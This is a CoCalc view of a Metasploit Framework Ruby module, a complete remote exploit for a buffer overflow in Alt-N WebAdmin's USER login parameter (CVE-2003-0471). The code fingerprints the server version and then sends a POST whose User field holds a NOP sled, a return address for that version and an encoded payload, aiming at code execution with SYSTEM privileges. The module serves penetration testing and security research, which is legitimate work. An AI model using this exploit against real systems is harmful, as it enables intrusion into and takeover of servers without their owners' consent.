Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/altn_webadmin.rb
19664 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Alt-N WebAdmin USER Buffer Overflow',
16
'Description' => %q{
17
Alt-N WebAdmin is prone to a buffer overflow condition. This
18
is due to insufficient bounds checking on the USER
19
parameter. Successful exploitation could result in code
20
execution with SYSTEM level privileges.
21
},
22
'Author' => [ 'MC' ],
23
'License' => MSF_LICENSE,
24
'References' => [
25
[ 'CVE', '2003-0471' ],
26
[ 'OSVDB', '2207' ],
27
[ 'BID', '8024'],
28
[ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=11771']
29
],
30
'Privileged' => true,
31
'DefaultOptions' => {
32
'EXITFUNC' => 'thread',
33
},
34
'Payload' => {
35
'Space' => 830,
36
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
37
'StackAdjustment' => -3500,
38
39
},
40
'Platform' => 'win',
41
'Targets' => [
42
['Automatic', {}],
43
['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll
44
['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll
45
['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll
46
['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
47
],
48
'DefaultTarget' => 0,
49
'DisclosureDate' => '2003-06-24',
50
'Notes' => {
51
'Reliability' => UNKNOWN_RELIABILITY,
52
'Stability' => UNKNOWN_STABILITY,
53
'SideEffects' => UNKNOWN_SIDE_EFFECTS
54
}
55
)
56
)
57
58
register_options([Opt::RPORT(1000)])
59
end
60
61
def exploit
62
mytarget = target
63
64
if (target.name =~ /Automatic/)
65
res = send_request_raw({
66
'uri' => '/WebAdmin.DLL'
67
}, -1)
68
69
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
70
case $1
71
when /2\.0\.4/
72
mytarget = targets[1]
73
when /2\.0\.3/
74
mytarget = targets[2]
75
when /2\.0\.2/
76
mytarget = targets[3]
77
when /2\.0\.1/
78
mytarget = targets[4]
79
else
80
print_error("No target found for v#{$1}")
81
return
82
end
83
else
84
print_error("No target found")
85
end
86
end
87
88
user_cook = rand_text_alphanumeric(2)
89
post_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded
90
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
91
92
print_status("Sending request...")
93
res = send_request_cgi({
94
'uri' => '/WebAdmin.DLL',
95
'query' => 'View=Logon',
96
'method' => 'POST',
97
'content-type' => 'application/x-www-form-urlencoded',
98
'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",
99
'data' => post_data,
100
'headers' =>
101
{
102
'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
103
'Accept-Language' => 'en',
104
'Accept-Charset' => 'iso-8859-1,*,utf-8'
105
}
106
}, 5)
107
108
handler
109
end
110
end
111
112